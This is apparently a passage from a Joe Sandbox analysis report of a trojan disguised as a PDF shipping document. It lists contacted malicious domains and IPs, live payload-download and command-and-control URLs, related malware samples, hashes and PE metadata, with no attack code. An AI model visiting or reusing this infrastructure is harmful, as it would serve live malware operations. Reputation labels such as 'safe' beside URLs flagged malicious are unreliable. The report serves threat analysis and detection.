      http://www.images77.com/icm9/www.gcsisgreen.com0%Avira URL Cloudsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.machevate.comReferer:0%Avira URL Cloudsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.mademoisellepierre.comReferer:0%Avira URL Cloudsafe
      http://www.drinksandfruits.com0%Avira URL Cloudsafe
      http://www.smartbulk.storeReferer:0%Avira URL Cloudsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.cannahavedessert.com0%Avira URL Cloudsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
lifeandhealth.com.mx | 192.185.170.106 | true | false | | unknown
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | 3.223.115.185 | true | false | | high
drinksandfruits.com | 68.70.163.36 | true | true | | unknown
www.iatlet.com | 156.224.66.93 | true | true | | unknown
www.drinksandfruits.com | unknown | unknown | true | | unknown
www.leepl.com | unknown | unknown | true | | unknown

              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.iatlet.com/icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr | true | Avira URL Cloud: safe | unknown
http://www.drinksandfruits.com/icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr | true | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.smartbulk.store | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.faithinfitness.net | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://lifeandhealth.com.mx/) | Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://www.cannahavedessert.com/icm9/www.kalcio.site | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.faithinfitness.net/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.nationalcanopies.com/icm9/www.cannahavedessert.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.smartbulk.store/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.iatlet.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.84streetchamber.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.iatlet.com/icm9/www.leepl.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.drinksandfruits.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.leepl.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://cert.int-x3.letsencrypt.org/0 | Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | false | | high
http://www.faithinfitness.netReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.nationalcanopies.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.faithinfitness.net/icm9/www.hunexhq.icu | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.frontierautoglasswheatfield.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.84streetchamber.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://cps.root-x1.letsencrypt.org0 | Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.images77.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mademoisellepierre.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.images77.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://cps.letsencrypt.org0 | Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.cannahavedessert.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gcsisgreen.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.iatlet.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.images77.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.frontierautoglasswheatfield.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.84streetchamber.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gcsisgreen.com/icm9/www.smartbulk.store | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hunexhq.icu | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.leepl.com/icm9/www.nationalcanopies.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.machevate.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.verifyinstagram-help.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hunexhq.icu/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kalcio.site/icm9/www.mademoisellepierre.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.drinksandfruits.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.verifyinstagram-help.com/icm9/www.faithinfitness.net | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.frontierautoglasswheatfield.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.leepl.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.kalcio.siteReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.mademoisellepierre.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.machevate.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.verifyinstagram-help.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gcsisgreen.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.84streetchamber.com/icm9/www.verifyinstagram-help.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kalcio.site | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.images77.com/icm9/www.gcsisgreen.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.machevate.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://fontfabrik.com | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.mademoisellepierre.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.drinksandfruits.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.smartbulk.storeReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.cannahavedessert.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sakkal.com | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.nationalcanopies.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://lifeandhealth.com.mx/x | Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.kalcio.site/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mademoisellepierre.com/icm9/www.images77.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.leepl.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cannahavedessert.comReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.int-x3.letsencrypt.org0/ | Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.verifyinstagram-help.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bind | Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://www.nationalcanopies.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bin_ | Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hunexhq.icu/icm9/www.frontierautoglasswheatfield.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gcsisgreen.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.frontierautoglasswheatfield.com/icm9/M | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.machevate.com/icm9/www.84streetchamber.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.drinksandfruits.com/icm9/www.iatlet.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.smartbulk.store/icm9/www.machevate.com | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hunexhq.icuReferer: | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.iatlet.com/icm9/ | explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                                    Contacted IPs


                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
68.70.163.36 | unknown | United States | 22458 | NETSOURCEUS | true
156.224.66.93 | unknown | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
192.185.170.106 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | false

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:320999
                                    Start date:20.11.2020
                                    Start time:08:52:42
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 21s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:Shipping Documents (INV,PL,BL)_pdf.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:16
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@7/0@4/3
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 52.7% (good quality ratio 45.8%)
                                    • Quality average: 71.4%
                                    • Quality standard deviation: 33.5%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.139.144, 92.122.144.200, 52.147.198.201, 13.88.21.125
                                    • Excluded domains from analysis (whitelisted): skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus15.cloudapp.net, umwatsonrouting.trafficmanager.net, fs.microsoft.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolwus15.cloudapp.net
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                      Match | Associated Sample Name / URL | Detection | Context
                                      192.185.170.106 | AWB# 9284730932.exe | malicious |

                                      Domains

                                      Match | Associated Sample Name / URL | Detection | Context
                                      HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | ORDER LIST.exe | malicious | 3.223.115.185
                                       | ALPHA_PO_16201844580.exe | malicious | 3.223.115.185
                                       | H4A2-423-EM152-010.TIF.exe | malicious | 3.223.115.185
                                       | Cirwgl94Bl.exe | malicious | 3.223.115.185
                                       | wPthy7dafVcH94f.exe | malicious | 3.223.115.185
                                       | Agolives.exe | malicious | 3.223.115.185
                                       | lzQr2RjcQJ.exe | malicious | 3.223.115.185
                                       | xYctZarwRn.exe | malicious | 3.223.115.185
                                       | mani.exe | malicious | 3.223.115.185
                                       | PO8479349743085.exe | malicious | 3.223.115.185
                                      lifeandhealth.com.mx | AWB# 9284730932.exe | malicious | 192.185.170.106

                                      ASN

                                      Match | Associated Sample Name / URL | Detection | Context
                                      NETSOURCEUS | PO-90291.exe | malicious | 68.70.163.34
                                       | 1XrdOdPqR6jBVMu.exe | malicious | 68.70.164.21
                                       | ADHOC RFQ-97571784.exe | malicious | 68.70.164.28
                                       | QUOTATION DEMAND.exe | malicious | 67.217.34.86
                                       | ADHOC RFQ-97571784.exe | malicious | 68.70.164.28
                                       | lxBLR3l92hX32RT.exe | malicious | 67.217.34.70
                                       | http://2friends.mx/Swift-Advice/Swift%20advice.exe | malicious | 67.217.34.74
                                       | https://vixim.com.mx/julyupdates/bioupdate/?email=bre@gov.nl | malicious | 67.217.34.60
                                      UNIFIEDLAYER-AS-1US | Information-822908953.doc | malicious | 192.232.229.53
                                       | https://filmconsultancy.bindwall.ml/mike@filmconsultancy.com | malicious | 162.241.67.201
                                       | https://trondiamond.co/OMMOM/OM9u8 | malicious | 162.241.67.195
                                       | https://app.box.com/s/gdf36roak3w2fc52cgfbxuq651p0zehy | malicious | 162.241.87.44
                                       | ef5ai1p.dll | malicious | 192.232.229.53
                                       | http://septterror.tripod.com/the911basics.html | malicious | 192.254.236.192
                                       | Documentation.478396766.doc | malicious | 192.232.229.53
                                       | order.exe | malicious | 192.185.152.65
                                       | Documentation.478396766.doc | malicious | 162.241.44.26
                                       | 8OP0MEmSDd.dll | malicious | 192.232.229.53
                                       | Information-478224510.doc | malicious | 192.232.229.53
                                       | ZcmAPc4xeE.dll | malicious | 162.241.44.26
                                       | 7aKeSIV5Cu.dll | malicious | 192.232.229.53
                                       | qRMGCk1u96.dll | malicious | 192.232.229.53
                                       | qAm7u8G4lM.exe | malicious | 192.185.138.193
                                       | AWB# 9284730932.exe | malicious | 192.185.170.106
                                       | Document3327.xlsb | malicious | 198.57.244.39
                                       | POSH XANADU Order-SP-20093000-xlxs.xlsx | malicious | 192.185.144.204
                                       | dVcML4Zl0J.dll | malicious | 192.232.229.53
                                       | JTWtIx6ADf.dll | malicious | 192.232.229.53
                                      XIAOZHIYUN1-AS-APICIDCNETWORKUS | Purchase Order 40,7045$.exe | malicious | 45.207.121.138
                                       | Invoice.exe | malicious | 156.241.53.234
                                       | hjKM0s7CWW.exe | malicious | 45.207.121.138
                                       | n4uladudJS.exe | malicious | 45.207.121.138
                                       | T66DUJYHQE.exe | malicious | 45.207.121.138
                                       | #U5341#U4e00#U6708#U4efd#U516c#U53f8#U503c#U73ed#U4eba#U5458#U8c03#U73ed#U901a#U77e5.exe | malicious | 156.253.88.154
                                       | 9qB3tPamJa.exe | malicious | 156.253.114.216
                                       | zYUJ3b5gQF.exe | malicious | 45.207.121.138
                                       | Purchase Order 40,7045$.exe | malicious | 45.207.121.138
                                       | RNM56670112.exe | malicious | 156.225.160.251
                                       | PpCVLJxsOp.exe | malicious | 154.210.136.219
                                       | PO PL.exe | malicious | 156.254.247.54
                                       | 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | malicious | 156.254.221.125
                                       | 3BJGa7Xw4ugPpll.exe | malicious | 23.248.240.227
                                       | y20dxdW3GQ.exe | malicious | 23.235.182.106
                                       | J3ae2JBEng.exe | malicious | 45.207.118.132
                                       | New Sample_4522.Scan.pdf....exe | malicious | 45.207.123.138
                                       | Doc11.exe | malicious | 45.207.122.153
                                       | Wra81p6I2C.exe | malicious | 45.207.120.147
                                       | Swift_copy.exe | malicious | 45.207.119.154

                                      JA3 Fingerprints

                                      Match | Associated Sample Name / URL | Detection | Context
                                      37f463bf4616ecd445d4a1937da06e19 | https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.php | malicious | 192.185.170.106
                                       | https://filmconsultancy.bindwall.ml/mike@filmconsultancy.com | malicious | 192.185.170.106
                                       | https://trondiamond.co/OMMOM/OM9u8 | malicious | 192.185.170.106
                                       | https://www.canva.com/design/DAEN9RlD8Vk/acBvt6UoL-DafjXmQk38pA/view?utm_content=DAEN9RlD8Vk&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink | malicious | 192.185.170.106
                                       | https://bit.ly/2UDM1To | malicious | 192.185.170.106
                                       | https://app.clio.com/link/AxWtfjmmzhja | malicious | 192.185.170.106
                                       | order.exe | malicious | 192.185.170.106
                                       | http://45.95.168.116 | malicious | 192.185.170.106
                                       | https://u7342898.ct.sendgrid.net/ls/click?upn=HCSIWZDf9Xl-2FB6XFKqg1zjEMCja-2BnYJ5hRYKkDjy2dSVqjHsLlv5ZMXJXnh9JLSzwabeBrvYMnX699odsYkKotv4jgW-2BTippSHf276Hpn3fz0kcusnYHGKND7vKQPAS7g42-2FTb5zb8CNq57r3z9Ilg-3D-3DWdrE_hNl5WjNXy0NQcJb9WqI7qh7uPLeU7UGDRahFCFKbQLS6qwym7zJ-2B-2BhWsSSLs8pHa1w9VDlWPsA7ahHsZZucjX2ktFkSy5vhVZT2L3Jxh6b-2FoboCHa2CJGLfF19s71-2FI3WPC7rECe-2BEO9fLwbfggsNq2V1-2FqgMhzgJQL411ZuD7Y8pECisPKLf0vf9WvB1fyVO9o6Euui31Jg3e-2FDialpg2CbkM21Us8J-2FBk13yWzh58-3D | malicious | 192.185.170.106
                                       | https://carolearmstrongrealestate.com/wpe/14ea332d0684051d9fef033a5f1607dd?usr=cnBlbmRsZXRvbkBkYXRlc3dlaXNlci5jb20= | malicious | 192.185.170.106
                                       | dde1df2ac5845a19823cabe182fcd870.exe | malicious | 192.185.170.106
                                       | https://prod.dfg152.ru/activate?key=23696252760045174930 | malicious | 192.185.170.106
                                       | dde1df2ac5845a19823cabe182fcd870.exe | malicious | 192.185.170.106
                                       | BYRkah8GsZ.exe | malicious | 192.185.170.106
                                       | https://www.canva.com/design/DAEN3YdYVHw/zaVHWoDx-9G9l20JXWSBtg/view?utm_content=DAEN3YdYVHw&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton | malicious | 192.185.170.106
                                       | splwow64.exe | malicious | 192.185.170.106
                                       | NyUnwsFSCa.exe | malicious | 192.185.170.106
                                       | https://signup.kwikvpn.com/ | malicious | 192.185.170.106
                                       | AWB# 9284730932.exe | malicious | 192.185.170.106
                                       | https://www.canva.com/design/DAENqED8UzU/0m_RcAQIILTwa79MyPG8KA/view?utm_content=DAENqED8UzU&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton | malicious | 192.185.170.106

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):4.744884887690859
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.15%
                                      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Shipping Documents (INV,PL,BL)_pdf.exe
                                      File size:86016
                                      MD5:aed402d9a5675f5796265e5170ada7cb
                                      SHA1:d2e2087f83c1ef3d10cbe60acb721745d19306b3
                                      SHA256:44350179d4fdd08fd02c02b733f80c82d54f5af31c8a2432de9cfb6b11ab4aa0
                                      SHA512:273c3a9438bf415398cd5142a9281b4c5508f897d8d9f52e9e5da131eb83301fd4b043fcde8c2111436ef74fd53c7dbe7fc3991bd40710b7059c406bbe7cb8c8
                                      SSDEEP:768:DYldnp1qLYHCVa/XGBCsdLD+isFihijpdpQU9z5cy1M:KdnGDauosdLD+isUEpYByq
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......_.....................@......`........ ....@................

                                      File Icon

                                      Icon Hash:00d6d4ec71b24430

                                      Static PE Info

                                      General

                                      Entrypoint:0x401360
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                      DLL Characteristics:
                                      Time Stamp:0x5FB6B4D8 [Thu Nov 19 18:09:28 2020 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:0cb4f4ece3f5875b40d2bf4babdf78ef

                                      Entrypoint Preview

                                      Instruction
                                      push 0040393Ch
                                      call 00007F0E149E12B5h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      inc eax
                                      add byte ptr [eax], al
